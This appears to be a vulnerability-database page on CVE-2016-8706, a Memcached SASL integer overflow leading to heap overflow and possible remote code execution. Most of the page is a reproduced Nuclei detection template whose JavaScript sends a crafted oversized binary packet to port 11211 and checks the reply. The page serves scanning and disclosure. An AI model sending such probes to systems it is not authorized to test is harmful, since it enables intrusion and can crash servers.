CVE-2016-8706: Memcached Server SASL Authentication - Remote Code Execution

日期: 2025-08-01 | 影响软件: Memcached Server | POC: 已公开

漏洞描述

An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.

PoC代码[已公开]

id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.68629
    epss-percentile: 0.98539
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached,vuln

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a00463044022079f9220661851cd4375ccab3350fa2f22eda069b24a37901dc4d0b1ac2cdd85e02202fe31ea9fd53e88e9871e9074d49f94f97824502c1b4e5352d4c45f4e6068e0b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2016/CVE-2016-8706.yaml